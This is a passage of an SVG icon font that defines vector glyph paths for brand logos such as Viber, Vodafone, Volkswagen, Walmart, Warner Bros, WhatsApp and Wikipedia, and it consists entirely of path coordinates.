0 83 0 124 0v35l-71 0c21 23 41 46 62 69z m-171 40l0 0v-144h44c0 48 0 96 0 144-15 0-29 0-44 0z m578 72c-17-39-36-77-54-116-6 15-14 29-20 44-8 1-15 0-23 0 11-24 23-48 34-72h18c23 48 45 97 68 145-8 0-15 0-23-1z m-99-100c-5 13-14 23-26 28-17 7-38 6-52-5v0c-6-4-10-10-14-15 0 7 0 14 0 20h-43v-144c15 0 30 0 44 0v80c0 9 3 18 9 25 8 8 22 9 32 3 6-5 9-13 9-21v-87c15 0 29 0 44 0v76c0 14 1 27-3 40z m-479 80h0l0-40h44c0 13 0 27 0 40h-44z m311-67c-19 17-45 22-69 18-24-4-45-21-54-44-6-13-7-28-6-42 3-25 18-48 41-58 30-14 68-9 91 15 29 30 28 84-3 111z m-30-91c-11-13-35-14-45 0-10 13-11 30-9 46 2 12 7 26 20 30v0c9 3 20 2 28-3 10-8 14-21 15-33 1-14 0-29-9-40z" />
<glyph glyph-name="brand-viber" horiz-adv-x="1000" unicode="&#xe952;" d="M940 591c-20 115-78 196-197 226-161 41-322 46-483 2-103-29-170-96-193-201-26-113-27-228-7-342 19-107 76-186 184-221 17-5 21-14 21-30-1-57-1-115-1-172 2-1 4-2 6-3 6 7 11 13 17 19 43 47 86 94 130 140 6 6 16 13 24 12 101-5 199 7 297 31 105 25 170 88 194 191 27 115 29 232 8 348z m-418 117c135-4 243-118 246-258-1-13 2-30-16-30-18-1-17 17-17 29-5 83-36 150-109 194-33 20-71 25-108 31-12 2-27 1-26 17 1 18 17 17 30 17z m19-100c-13 2-30 2-27 21 3 18 19 13 32 11 93-14 156-82 156-168-1-12 1-26-16-27-15 0-15 13-16 24-11 86-46 123-129 139z m96-125c-1-8-4-14-12-16-11-2-18 4-19 13-3 38-23 59-61 63-10 2-15 10-12 20 3 10 11 11 26 11 39 1 84-48 78-91z m3-325c-195 80-332 217-407 414-20 52 31 126 86 127 14 0 26-5 36-15 28-29 52-61 72-96 15-27 11-49-14-69-34-27-37-41-17-81 27-57 72-97 130-123 24-9 41-6 57 15 31 38 48 40 90 15 29-18 55-39 81-61 10-9 18-19 17-29 1-59-80-118-131-97z" />
<glyph glyph-name="brand-vodafone" horiz-adv-x="1000" unicode="&#xe953;" d="M674 803c-49-8-87-13-125-22-173-44-300-188-319-359-17-151 74-286 214-316 127-28 256 50 292 175 37 133-27 258-157 303-48 17-50 20-36 70 18 69 62 114 128 137 14 4 34 0 49-7 192-90 304-293 276-496-30-210-195-378-405-414-266-45-515 112-577 364-65 262 108 531 377 584 93 19 184 15 283-19z" />
<glyph glyph-name="brand-volkswagen" horiz-adv-x="1000" unicode="&#xe954;" d="M999 384c-7 97-39 185-97 262-72 97-167 161-284 190-32 8-65 12-98 13-2 0-4 1-6 1h-28c-7 0-13-1-20-1-45-3-89-12-131-27-163-57-285-194-323-363-10-46-14-91-11-138 12-217 164-401 375-456 47-12 94-17 142-15 116 5 219 45 307 121 84 71 138 162 163 270 7 30 10 60 11 91 1 1 1 3 1 5v26l-1 21z m-499-466c-239 0-432 194-432 432 0 239 193 432 432 432 239 0 432-193 432-432s-194-432-432-432z m280 650c-22 27-46 51-75 71-5 4-11 8-17 12l-2-4c-44-93-87-186-130-279-2-3-3-4-6-4-30 0-60 0-89-1-4 0-6 1-8 5-46 93-92 186-138 279 0 2-1 3-2 5-2-1-3-2-5-3-35-23-65-50-90-83-2-3-2-5-1-8 57-121 113-242 169-363 1-3 2-6 4-9 1 2 1 4 2 5 19 49 38 98 58 147 1 3 2 4 6 4 32 0 63 0 95 0 4 0 5-1 6-4 9-22 18-44 27-66 11-26 22-53 33-79 1 1 1 2 2 3 54 121 108 243 162 364 1 3 1 5-1 8z m-54-492c28 23 51 50 71 80 20 31 35 63 45 98 9 35 14 71 12 107-1 37-12 95-20 105-67-148-134-296-201-445 21 6 65 32 93 55z m-567 372c-26-99-16-193 37-281 42-70 102-119 177-149 0 1 0 1 1 1l-214 429c-1 0-1 0-1 0z m250-441c65-17 130-16 194 3-34 81-67 161-101 242-31-82-62-163-93-245z m191 683c-64 19-128 19-193 2 33-75 65-149 98-225 32 75 63 149 95 223z" />
<glyph glyph-name="brand-walmart" horiz-adv-x="1000" unicode="&#xe955;" d="M500 845c-38 0-68-21-68-47l23-258c2-16 21-28 45-28 23 0 42 12 45 28l23 258c0 26-30 47-68 47z m-143-362l-215 149c-22 13-56-2-75-35-18-33-15-69 7-82l238-109c14-6 34 5 46 25 12 20 11 42-1 52z m331-77l238 109c22 13 26 50 6 82-18 33-52 48-75 35l-215-149c-12-10-13-32-1-52 12-20 32-31 47-25z m-188-218c-24 0-43-12-45-28l-23-258c0-26 30-47 68-47 38 0 69 21 69 47l-23 258c-3 16-23 28-46 28z m426-4l-238 110c-15 6-36-5-47-25-12-20-11-42 1-53l215-149c23-13 56 2 75 35 20 33 16 69-6 82z m-614 110l-238-109c-22-13-25-50-6-82 18-33 52-49 74-36l215 149c13 10 13 33 1 53-12 21-31 31-46 25z" />
<glyph glyph-name="brand-warnerbros" horiz-adv-x="1000" unicode="&#xe956;" d="M931 623c0 7-3 9-9 11-24 5-48 12-73 17-6 2-9 5-11 11-3 15-8 29-11 43-1 8-5 10-12 12-25 5-50 11-75 17-5 1-7 3-9 8-4 18-10 35-14 52-2 6-4 8-10 10-64 14-129 29-193 43-8 2-15 4-23 2-66-15-132-30-197-46-6-1-8-3-10-9-4-17-9-33-14-50-1-6-4-9-10-10-25-6-50-12-75-18-6-1-10-4-11-10-4-15-9-29-12-44-2-7-4-10-10-11l-73-17c-7-2-10-4-10-12 0-31 1-62 3-93 5-65 17-128 37-189 48-148 128-274 238-382 43-42 91-78 144-106 5-2 9-3 15 0 21 11 41 23 60 36 74 52 135 117 188 188 112 150 173 317 177 505 0 13-1 28 0 42z m-54-51c-1-1 0-3 0-5-4-125-38-241-99-350-51-91-114-173-192-243-24-21-50-40-78-56-6-3-10-2-15 0-44 24-81 57-116 92-74 77-135 164-181 260-38 80-61 165-69 253-2 18-3 35-4 53 0 6 2 9 9 10l61 14c6 1 8 4 9 9 4 16 9 31 13 47 2 6 5 9 11 11 26 5 52 12 78 18 6 1 8 3 9 9 4 17 9 34 13 51 2 6 5 9 10 10 52 12 104 24 155 36 5 1 10 1 14 0 53-12 106-24 158-36 7-1 11-4 12-11 4-17 9-34 13-51 1-4 3-6 8-7 26-7 53-13 80-19 6-2 9-5 11-11 3-16 7-31 11-46 1-5 4-9 10-10 19-4 38-9 57-13 9-2 14-5 12-15z m-149 62c-58 43-123 69-191 90-8 2-10 2-10-7 0-242 0-484 0-726 0-3-1-6 2-8 2 1 4 3 6 4 56 50 107 104 153 163 34 45 64 92 80 146 13 44 10 85-25 118 9 9 18 17 26 26 40 41 44 96 11 143-14 20-32 37-52 51z m-29-347c-25-58-61-108-106-152-1-1-2-1-4-2v28c0 58 0 116 0 174 0 7 2 11 8 15 18 12 38 24 60 28 30 6 50-10 52-40 1-18-4-35-10-51z m17 194c-24-23-54-35-84-48-11-5-23-9-34-14-7-3-9-2-9 6 0 58 0 115 0 173v35c34-10 64-26 93-44 13-8 24-16 35-26 34-28 26-58-1-82z m-251 245c-14-8-28-16-43-23-8-3-10-8-10-15 1-136 1-271 1-407 0-3-1-7-3-10-1-3-4-5-7-5-4 0-5 3-6 6-1 4-2 8-3 13-26 103-35 209-38 315-1 20 0 40 0 63-19-14-35-26-51-38-6-4-8-8-8-15 1-38 3-75 5-113 4-53 9-106 19-158 4-19 1-32-13-44-1 0-1-1-1-1-3-5-6-3-8 1-8 13-15 27-20 41-23 67-34 137-38 207-1 10-2 20-3 31-15-11-29-22-43-32-5-3-6-7-6-13 3-52 8-103 19-153 16-68 42-131 85-187 4-6 6-7 11 0 13 15 27 29 40 45 26-91 55-179 125-246l3 1v728c0 2 0 3 0 5 1 7-2 6-7 4z" />
<glyph glyph-name="brand-whatsapp" horiz-adv-x="1000" unicode="&#xe957;" d="M1000 363c0-269-220-487-491-487-86 0-167 22-237 60l-272-86 89 261c-45 74-71 160-71 252 0 269 220 487 491 487 271 0 491-218 491-487z m-491 410c-227 0-413-184-413-410 0-90 30-173 79-240l-52-152 159 50c65-43 143-68 227-68 228 0 413 184 413 410s-185 410-413 410z m248-522c-3 5-11 8-23 14-12 6-71 35-82 38-11 4-19 6-27-6s-31-38-38-46-14-9-27-3c-12 6-50 18-96 59-36 32-60 71-67 83s-1 18 5 24c5 5 12 14 18 21s8 12 12 20 2 15-1 21c-3 6-27 64-37 88-10 24-20 20-27 20-7 0-15 1-23 1-8 0-21-3-32-15s-42-41-42-99c0-59 43-116 49-124s83-132 205-180 123-32 145-30c22 2 71 29 81 57s10 52 7 57z" />
<glyph glyph-name="brand-wikipedia" horiz-adv-x="1000" unicode="&#xe958;" d="M997 424c-10 112-57 209-132 292-3 3-5 9-10 7-6-2 2-7-2-11-14 11-31 22-37 38-8 23-27 31-45 37-13 5-25 10-36 17-9 6-17 11-27 14-8 3-15 2-23-2-3-1-6-3-6-7 0-3 4-3 7-4 8-4 17-7 24-13-10-14-31-15-41-3-17 19-35 23-56 10-20-12-41-15-64-16-9 0-18 0-17 13 0 3-2 7-5 8-17 3-33 1-47-6-10-6-5-16-5-24 0-8-2-13-11-13-12 0-23-2-35-3-7 0-11-2-11-9-1-13-4-26-2-39 4-28 23-45 49-24 4 4 10 7 16 5 3-2 8-3 7-8 0-4-5-3-8-3-19-2-37-7-54-15-8-3-17-5-25-8-5-1-10-2-11 7 0 10-7 15-18 13-8 0-17-2-25-6-7-3-11-7-6-16 2-3 4-7-2-9-19-8-39-15-60-13-6 1-8 2-7 8 0 10-7 16-12 22-6 8-14 11-26 7 6 8 9 14 13 19 12 14 22 29 28 47 1 5 3 9 0 14-7 11-2 14 9 15 19 0 27 15 36 28 6 9 0 20-7 28l0 0c0 10-5 12-13 8-21-11-43-21-62-34-36-23-66-53-96-82-4-5-11-10-7-16 5-7 12-2 17 0 1 0 1-1 3-2-8-7-19-13-26-8-9 6-13 1-17-3-18-14-29-34-40-53-16-27-32-54-39-85 8-1 12 3 15 11 6 15 13 30 23 43 2 3 4 8 7 6 9-8 10 5 16 5-6-7-5-23-21-17-1 1-4-2-5-4-7-14-13-28-19-42-3-7-3-14 5-17 8-4 14-1 19 5 4 5 3 11 3 17 1 17 14 30 32 29 6 0 14-1 17-8 3-6-1-11-5-16l-5-8c-6-7-5-12 5-14 14-3 27-4 40 0 14 3 26-1 28-15 5-21 4-41-10-59-9-11-20-12-31-6-16 7-20 5-23-13-1-4-1-9-1-13 0-22 3-23 21-14 14 7 27 5 31-6 8-21 15-42 10-64-2-10 1-12 10-10 4 1 8 1 12 2 25 4 50 7 75-1 14-5 17-11 12-24-2-5-4-9-7-13-8-11-2-15 8-16 15-1 30-1 45 4 8 3 21 2 23 11 2 9-10 12-15 17-9 9-9 17 1 24 4 3 9 5 13 7 38 14 76 23 116 27 21 2 26 8 22 30-1 6-3 12-4 17-10 45-33 44-60 18-12-11-27-11-37-1-7 9-13 19-14 31-2 24 11 49 44 42 5-1 10-1 15-2 16-3 24 3 25 19 2 17-6 30-13 44-6 11-14 14-26 15-29 1-54-10-81-19-20-7-21-13-6-28 11-10 11-15-2-21-26-13-53-21-82-14-8 2-10 7-5 14 4 6 9 11 13 17 3 4 8 8 6 14-2 6-9 4-14 5-16 1-32-2-47-5-14-4-17-1-12 13 2 8 5 16 8 25-10-10-13-24-14-37-1-6-4-10-10-10-7 0-9 5-9 11 1 24 12 45 24 65 4 6 11 6 18 4 20-6 24-4 32 16 2 7 4 15 6 23 9-6 16-13 12-25-9-26-12-29-29-27-21 2-25 0-30-21 9 14 20 21 38 16 9-2 16 6 19 15 2 10 8 12 17 11 19-1 37 4 54 12 8 3 15 6 9 16-3 5-2 8 3 9 8 4 17 8 26 8 7 0 12-3 11-10-2-10 4-11 12-11 10 0 19 4 29 8 7 2 14 8 22 7-10-14-12-54-3-68 3-4 7-7 13-7 27 2 54 2 80 12 8 2 18 5 20 13 1 8-10 10-16 14-12 9-13 16 0 25 19 13 40 17 62 16 16 0 21-8 17-24-1-6-2-13 6-13 28 0 55 2 80 13 6 3 7 7 1 12-13 9-21 23-27 37-3 9-11 17-5 26 7 9 16 3 24 2 4-1 8-2 10 2 1 3-2 5-3 8-6 9-14 15-23 21-7 6-13 6-18-3-6-10-14-9-23-4-16 8-27 20-37 34-1 2-1 4 2 5 11-11 20-25 34-33 6-3 12-7 18 1 8 13 18 11 29 3 6-6 13-10 19-16 6-6 14-14 8-23-5-8-15-3-22 0-11 5-13 0-10-9 6-16 14-32 26-45 6-6 11-8 18-2 11 8 23 12 36 16 23 7 34 0 40-23l1-4c2-8 9-9 14-8 8 1 18 2 22 11 4 8-4 10-9 13-19 15-19 22 0 39 7 6 11 7 16-1-12-1-21-9-23-19-3-10 8-13 14-18 4-4 11-6 9-14-1-9-16-20-28-21-13 0-20 6-22 19-4 20-17 27-37 19l-23-11c-12-5-11-9-2-17 14-12 27-25 31-44 3-17-5-27-22-27-5 0-11 0-17 2-12 2-14-4-14-14-1-14 8-23 15-33 7-9 14-11 22-1 5 6 10 13 17 17 8 4 16 7 21-2 13-19 32-36 35-61 1-8 5-7 10-4 9 6 18 13 28 18 11 6 23 14 34 6 11-7 6-20 6-31 0-3-2-9 2-10 11-1 18 7 25 13 5 5 8 11 2 18-17 20-13 34 5 52 13 12 16 23 10 38-6 9-10 17-16 26-2 4-5 10-10 9-6-1-4-8-6-12 0-1 0-4 0-5 0-4-2-5-5-3-1 1-4 3-2 4 9 5 3 13 4 19 1 4 2 7 6 9 6 2 8-2 11-6 8-12 15-26 19-40 33-66 49-137 49-211 0-4-1-6-5-9-12-8-17-29-11-42 3-9 5-17-2-25-7-8-15-16-23-24-5-5-11-5-17-1-5 4-6 9-4 16 2 5 6 11 2 18-7-1-13-5-19-9-12-10-25-20-37-30-7-5-9-9-5-17 19-38 5-65-34-74-18-4-31-26-25-45 3-11 9-12 17-3 8 9 18 17 28 25 6 4 10 3 12-5 4-13 5-26 1-40 21 14 36 34 62 46-4-13-7-22-11-31-1-4 0-13-8-10-6 2 1 8 0 12 0 1-1 2-2 4-24-21-50-40-59-74 10 2 14 9 20 14 6 4 9 12 17 14 2-6 2-11-1-16-5-8-11-16-16-24-8-6-16-12-24-18-12-9-24-19-27-35 19 16 39 31 52 52 5 2 7 6 10 10 87 109 124 234 110 372z m-908 206c-3 20 16 10 20 17 1-14-15-7-20-17z m58 8c-3-9-7-18-17-22-2-1-6 0-8 1-4 2 0 5 0 7 0 8 14 14 2 23 3 1 5 3 7 3 4 0 4-4 3-6-2-6-5-12-7-17-1-3-3-6 1-8 2-1 4 1 6 3 5 6 8 13 9 21 1 7 5 10 13 8-7-2-7-8-9-13z m120-191c14 16 49 24 70 15 21-9 24-31 5-46-4-3-11-3-13-11 8 0 15 0 21 5 2 2 4 7 7 2 2-4 2-9-3-10-11-2-22-3-33-4-2-1-5 0-6 3 0 4 1 7 5 9 11 6 18 14 18 26 0 5 0 9-3 13-7 11-24 14-42 7-13-5-21-17-19-29 2-11 9-18 19-20 5-1 8-4 7-9-1-5-5-5-9-6-7-1-14-2-21-3-3 0-7-1-9 2-1 2-1 6 0 7 3 5 6 1 8 0 6-2 11-1 17 1-2 6-7 5-10 6-18 8-23 27-9 42z m-88 257c-4 10 11 14 16 24-6 3-10 1-15 0 1 3 3 4 5 5 6 2 14 7 18 2 4-6-5-10-9-15-2-3-8-5-6-10 1-5 7-3 11-4 3 0 5 0 6-3 0 0 0-2-1-2-9 0-21-6-25 3z m37-50c-7-2-14-1-10 10 6 19 16 37 29 52 13 15 21 32 27 51-11 0-16-9-24-11 3 16 20 32 35 32 10 1 15 8 20 13 5 5 9 10 13 15-6 4-12-4-18 0 8 4 14 14 24 6 0-1 0-2 0-3 12-21-1-33-15-45-4-3-7-5-13-5-14 1-18-6-14-20 4-16-5-30-15-42-10-13-21-25-26-42-1-6-7-9-13-11z m271 9c-8-1-15 0-22 2-5 1-10 2-15 3 11 8 24 6 37 9 4 1 6-2 6-6 1-4-2-7-6-8z m11 14c-10 20-19 23-35 13-26-16-40-8-43 26 6-7 9-14 17-15 8-1 14 3 20 8 8 6 16 13 28 6 11-8 17-22 13-38z m43 3c-2-3-3-7-8-5s-4 6-2 10c4 7 8 13 12 20 6 12 8 25 7 38 0 9-4 10-11 6-10-4-21-9-18-24 1-3 1-8-3-9-6 0-4 6-5 9-2 12 1 21 14 25 1 1 2 2 4 2 25 14 25 13 25-17 2-20-6-38-15-55z m65 37c-5-2-6 4-8 7-2 3-3 6-4 9-5 8-9 17-16 1-1-2-2-6-6-4-2 1-3 3-2 5 9 11 12 25 20 38-6-19 8-31 15-45 2-3 8-8 1-11z m148 18c3-7 9-13 9-23-12 8-17 21-19 32-3 13-10 17-20 20-8 1-16 3-24 7 17 12 37 14 49 3-6-2-12 1-18-4 7-11 21-8 32-13-9-5-12-12-9-22z m132-155c-5-3-5 7-9 7-4 0-8-2-4-8 3-4-1-9-3-6-5 10-17 7-23 13-5 5-8 10-5 17 14-16 24-17 35-4 3 3 6 7 4 11-1 5-6 3-10 3-9 0-13 5-15 12-1 7 5 9 10 11 2 1 5 2 7-1 1-2-1-4-4-5-3-1-8-2-6-7 2-5 6-4 10-4 13-1 18-9 13-21-1-2-2-4-3-6-2-5 10-7 3-12z m59-373c-4 5 5 17-10 15 1 1 1 5 1 5 8 1 5 13 13 13 5 0 2-4 4-6 7-12-1-19-8-27z m24 31c-1-1-4 0-7 0 5 10 14 24 5 29-8 6-14-10-21-16-6-5-7-12-17-18 10 21 24 34 38 47 2 2 5 3 7 0 7-7 4-36-5-42z m-471 82c0-27 26-42 50-29 10 6 20 15 31 18 10 3 21 6 30-3 12-12 13-53 1-66-5-4-10-5-16-5-13 0-26 0-39 0-11 0-20-5-23-17-5-15-6-31-4-47 1-15 8-21 24-20 11 0 22 1 33 3 27 3 55 6 79 21 16 9 16 13 1 22-18 11-18 17-1 29 23 16 48 25 76 30 10 1 22 7 28 0 6-8-4-17-8-25-4-9-3-15 8-13 30 5 58 12 82 30 5 4 8 7 4 14-11 22-7 46-3 69 2 15 14 25 29 26 17 2 19 4 18 21-1 8-2 15-6 22-8 12-11 13-20 1-4-4-9-9-13-13-13-13-21-12-31 3-3 4-5 9-7 14-5 15-6 30-6 48-4-2-7-3-8-5-29-23-63-28-99-30-14 0-19 9-15 22 1 5 4 9 5 14 2 4 2 9-5 9-27 2-54-1-77-18-8-6-7-13 2-19 6-3 11-8 17-12 7-5 7-11 0-16-5-4-10-8-16-11-33-17-69-21-105-19-9 1-12-1-14-10-1-13-2-26-2-38z m172 21c-8-8-9-41-2-47 3-2 5 0 7 2 13 16 26 32 38 48 5 6 2 8-8 8 15 6 26 10 38 14-15-17-1-33 0-49 0-8 4-10 12-12-11-4-22-8-36-14 12 13 12 28 0 49-14-18-29-36-43-54-5-7 5-3 5-7-12-4-24-8-40-13 24 18 4 36 5 53 0 10-9 6-19 9 17 5 30 9 43 13z m186-305c9 6 16 12 23 26-8-7-13-11-17-14-4-3-7-7-12-3-4 3-4 7-4 12 0 4 7 8 3 14-25-16-52-26-80-34-4-1-11-5-14 1-3 5 2 10 5 14 3 5 9 9 9 18-28-6-54-15-77-32-8-6-3-9 3-12 4-2 10-1 10-7-1-4-6-7-9-9-5-2-10-5-15-7-28-13-58-18-88-22-10-1-17-13-17-27 1-13 10-10 17-10 10 0 18 3 26 7 13 7 27 10 41 12 9 2 11-3 9-10-3-13-16-25-29-27-13-3-27-1-40-7-7-3-13-9-11-17 3-9 11-8 19-7 22 5 43 13 64 21 5 2 23-1 10 15-1 2 2 6 6 7 20 9 38 21 60 25 3 1 7 0 10 1 0-15 11-2 17-7-12-4-23-16-34-13-15 6-24-5-37-6-2-1-6-3-4-7 4-9-4-11-9-13-29-15-61-23-94-27-5 0-13-3-17 4-3 9 0 17 6 23 3 5 8 7 13 8 12 4 24 5 36 6 7 1 12 3 15 9 2 4 2 7-1 9-6 4-12 3-18 0-2 0-5-1-7-2-10-4-21-9-31-11-21-6-32 8-27 28 2 4 5 8 4 14-38-2-74-10-113-18 6-7 11-7 16-10 3-1 8-2 7-7 0-4-5-5-8-5-29-7-59-7-89-3-9 1-15 5-6 15 4 5 5 9-4 10-25 4-50 5-75 6-10 0-11-4-7-11 7-15 24-25 43-24 18 1 34-3 50-13 3-2 7-4 5-9-1-4-5-5-9-5-6 0-8 1-10 8-6 16-23 16-38 14-26-3-44 10-57 31-4 7-8 9-14 10-15 3-30 7-43 16 8-2 15-4 22-7 7-2 15-5 23-5 3 1 7-1 9 3 3 4 0 7-2 10l-24 28c-6 8-14 12-24 9-18-4-29 4-38 17-3 4-5 9-10 11-1-4-2-7-4-11-1-2-4-4-6-2-3 1-2 3-2 5 0 26-15 44-43 51 6-12 12-24 17-35-6 16-26 18-35 32 5 4 8-4 12 1 0 5-7 9-3 17 17-10 34-17 47-31 5-5 8-18 20-6 2 4 11 1 16-1 7-3 13-7 20-9 4-2 9-5 11 1 4 11-1 21-7 29-7 9-8 23-24 24l-1 0c-30-2-56 10-80 25-9 5-12 12-7 22 2 3 5 8 1 10-11 8-23 18-41 16 6-9 10-17 15-25 2-4 7-8 3-13-5-5-10 0-15 2-3 2-6 4-7 7 5 1 10-4 13 1 3 4-2 8-4 12-3 4-6 7-8 11-2 3-5 7-2 10 2 3 6 3 9 2 16-4 30-11 43-21 7-5 10-11 5-20-4-6-2-10 4-13 20-11 40-21 64-20 7 0 11 2 5 9-15 17-12 38-11 58 0 10 6 14 16 15 11 1 22-2 32-7 5-2 10-5 14 1 7 9 2 36-8 48-10 11-19 3-27-2-22-16-45 0-49 25-1 11-1 21 0 32 1 23 3 19-18 15-20-3-37 3-54 10-12 5-15 15-9 27 8 18 2 26-17 26-11 0-14-5-11-15 2-6 5-12 5-19 0-6-1-11-7-13-5-3-10-4-16 0-5 3-8 15-15 10-6-5-2-15-2-22 0-2 0-4 1-6 2-11-2-26 16-28 3 0 5-6 7-9 5-14 6-29 7-43 0-2 1-5-2-6-3-2-4 0-6 2-1 2-5 5-3 8 11 11 1 23 0 34 0 4-1 8-6 7-10-2-10 6-12 12-7 19-5 39-6 59 0 7 0 14-8 19-2-37 2-73 11-108 5-21 7-44 21-63-2-5 0-9 3-14 7-16 17-33 24-49 15-32 34-60 56-86 131-149 296-204 490-167 77 14 146 48 207 98 2 2 8 5 6 7-8 8 0 13 3 17 8 14 20 24 34 33z m-782 214c5-1 10-2 8 6-2 9 4 12 11 10 11-2 21-7 28-17-7 4-15 7-22 10-4 2-8 4-11-2-2-4 0-8 4-9 8-3 4-8 5-13 1-12 4-23 6-35-11 9-9 21-12 33-1 5-2 12-9 10-7-2-3-8-2-12 1-9 5-18 4-27-4 9-10 13-19 16-7 3-17 10-12 20 6 9 12-3 18-4 2 10 2 10-7 13-5 3-12 3-18 9 12 0 19-6 28-8z m108-234c14-5 10-26 19-26-14 2-24 13-19 26z m148-109c-2 2-4 4-3 6 1 3 4 3 6 3 6-3 15 3 15-10 1-9 15-9 26-15-19 2-33 5-44 16z m-67 423c-26 3-52 4-78-2-6-1-9-4-10-10-2-14-4-29-2-44 2-25 13-32 35-22 14 7 28 9 42-3 12-11 16-31 10-48-5-14-12-18-27-13-8 2-16 6-24 8-5 1-13 4-13-6-1-17-3-35 5-52 4-10 10-14 21-13 32 2 64 5 96-3 24-6 27-11 19-34-3-9 0-10 7-11 14-2 28-1 42 2 8 2 19 1 22 9 2 8-10 9-16 13-11 8-10 16 2 22 6 3 14 5 20 7 35 9 71 16 108 21-10 20-7 40-4 60 2 16 12 24 25 29 11 4 22 4 33 2 24-3 36 11 29 34-7 23-22 29-42 16-6-4-12-7-17-11-32-24-59 5-59 32-1 13-1 26 2 40 3 14-1 17-16 15-34-5-67-13-99-24-7-2-16-2-17-9-1-9 8-11 15-15 2-1 4-3 7-4 9-8 10-16-1-21-29-13-59-25-92-20-28 3-31 10-16 35 8 12 7 18-7 20z m81-78c13 1 26 3 38 5 8 1 11-1 12-8 2-10 4-19 5-29 2-13 2-28 26-22-11-9-70-16-89-12 11 2 11 7 9 16-4 13-6 27-9 41-1 6 0 9 8 9z m-41-22c-2 3-6 1-9 1-4 0-7-1-11 1 3 5 8 5 10 10 1 7 8 7 11 0 0-2 1-4 1-4 24 0 5-12 5-19 7-3 9 7 17 6-5-6 2-25-17-12-3-7 0-13 1-19 1-4 5-10-1-12-8-2-6 5-8 9 0 2-1 3-1 5-3 15-3 15-19 12 6 5 12 8 16 12 3 2 7 5 5 10z m137 267c-8 1-16 2-23 4-12 4-18-2-21-13-2-7-3-14-1-22 6-23 20-29 40-16 9 5 17 11 27 13 16 5 30 0 35-14 8-22 17-44 13-68-1-5 0-7 5-7 33 0 65 2 95 17 23 10 23 14 2 29l-6 4c-10 6-9 14-1 21 4 4 8 7 13 10 22 14 48 18 74 20 21 2 25-4 17-23-8-20-8-20 21-20 19 1 44 6 67 18 20 11 24 26 14 46-4 8-9 16-15 23-19 23-19 32-41 3-7-9-16-11-24-5-17 12-28 28-28 49 0 16 8 23 24 22 6 0 12-1 19-2 10-1 12 3 12 13-2 19-16 29-27 42-6 7-12 9-21 3-23-16-50-17-76-18-20 0-25 6-20 26 1 7 0 11-8 11-17 0-35 0-51-7-5-2-12-3-12-9-1-7 5-9 9-12 3-2 7-4 11-7 7-5 9-10 1-16-13-11-26-21-44-23-15-2-30-5-45-5-14-1-15-2-7-15 5-9 10-18 12-28 5-26-14-47-40-44z m139 56c-7-8-3-12 2-16 7-6 13-12 21-17 4-3 7-12 13-4 5 7 11 16 1 23-8 7-15 13-27 16 7 5 14 5 20 8 2 0 5 2 4-3 0-10 9-15 14-12 6 3 9 13-1 20 9 3 15 5 23 7-24-36-19-35 4-48 10 19 13 45 4 50 6 4 13 6 20 8-10-19-11-39-16-59-5-17-5-17-19-6-15 11-15 11-21-6l-2-4c-7-16-7-16-21-4-10 9-19 17-29 26-7 5-13 10-23 9 9 7 20 8 33 12z m269-370c15 2 22 10 25 24 2 8 1 16-1 24-6 18-9 19-25 8-25-17-53-29-83-35-7-2-15-3-20 4-4 6 0 13 3 19 2 3 4 6 6 10 3 9 2 15-10 13-21-4-41-10-60-21-25-13-25-16-2-32 10-6 10-12 1-18-13-11-29-18-45-22-24-7-49-10-73-12-4 0-10 2-12-3-2-4 4-7 6-11 3-5 7-10 10-15 14-25 2-48-27-48-13 0-26 1-39 1-16 0-22-11-15-26 6-14 21-20 36-14 12 5 24 11 38 12 15 2 24-4 29-18 4-12 5-23 1-37 34 4 66 8 95 24 5 3 11 5 1 11-13 8-13 12 0 21 27 18 57 27 88 35 9 2 9-3 7-9-4-7-8-14-13-23 29 7 55 18 77 35 19 16 26 35 20 59-2 11-6 9-12 3-7-6-12-15-18-22-10-12-23-10-29 4-2 6-4 12-2 19 5 24 18 38 43 40z m-73-78c-6 0-3 11-3 16-2 23-1 23-23 15-18-7-36-15-56-20-4-1-9-2-13 2-2 1-1 5 1 6 4 3 5 10 14 7s16 3 24 6c14 4 26 9 39 14 17 6 20 4 22-12 0-5 0-10 1-15 0-1 0-2 0-3-2-5 4-16-6-16z m-321-140c38 9 76 16 114 19 6 1 10 2 13 7 8 13 5 26-1 38-6 10-17 6-27 5-3-1-6-2-9-3-11-4-22-10-34-13-12-3-23-3-31 8-8 9-13 19-8 32 5 13 17 16 30 17 13 0 27 0 40-1 13-1 18 6 20 17 6 23-25 56-48 53-30-5-58-11-87-18-8-3-21-2-22-9-1-10 13-11 20-16 4-3 10-3 10-10-1-5-7-6-11-8-28-12-58-13-87-14-11 0-22 2-29 12-5 9 5 14 8 20 2 7 6 15-4 16-31 6-62 5-95 1 11-15 21-27 26-41 2-6 5-13-1-18-6-5-13-9-21-6-9 4-17 8-25 11-5 2-10 7-14 3-4-4 1-9 4-14 5-6 10-13 15-19 3-4 7-7 13-6 39 6 58-21 75-49 4-6 8-7 14-8 29-1 58-2 86-9 9-3 18-4 5-14-5-4-3-8 3-9 20-2 41-4 61 5l-4 3c-5 2-14 2-13 9 0 8 9 7 14 9z m-43 49c-9 2-18 1-27-2-14-4-29-4-42 2-5 2-8 5-7 10 1 5 6 4 9 5 8 2 15 0 22-2 2-1 4-3 3-5-1-3-4-2-6-1-6 5-12 5-20 2 8-11 19-8 27-6 18 5 36 5 55 3 10-1 26-1 27 9 2 11-15 11-24 15-14 4-27 0-41 0-17-1-34-1-52-1-5 0-12-3-10 9 0 5-12-1-17 8 10-1 19 6 25-7 2-4 7-3 10-3 28 0 55 2 82 4 3 1 7 1 9 5 1 3-7 7 1 7 3 0 6 0 8-3 2-4 0-7-2-9-2-2-4-4-8-7 9-4 18-5 24-11 9-7 8-12-1-18-14-8-30-7-45-4z m-382 527c-18-50-28-102-29-155 0-9 4-14 12-20 3 17 3 34 3 50 0 2 1 6-2 6-8 1-7 6-6 11 1 3 3 3 6 2 5-2 5-6 5-11 0-4 1-9 0-13 0-17 0-34-2-51 0-10 5-16 13-20 4-3 9-3 13 1 6 6 1 13-1 20-1 3-2 6-2 10-2 6 1 11 7 14 9 6 32 1 42-9s5-18 0-27c-4-6-6-13 3-17 17-6 35-12 54-10 14 2 23 8 25 23 3 16-2 32-6 47-5 20-5 20-24 10-16-9-27-3-29 15 0 9-1 19 0 28 4 25 18 33 40 22 10-5 14-2 19 6 8 14 5 28 5 43 1 10-3 14-14 10-11-4-22-4-33-3-30 3-34 10-17 36 1 1 2 3 3 5 1 3 1 5-3 7-10 6-25-2-26-14-1-5-1-10-2-16-3-15-16-25-31-20-9 3-10-1-11-8-5-18-7-36-19-53-3 5-5 9-7 13 0 3 0 8 5 6 6-1 7-1 8 3 4 21 19 41 5 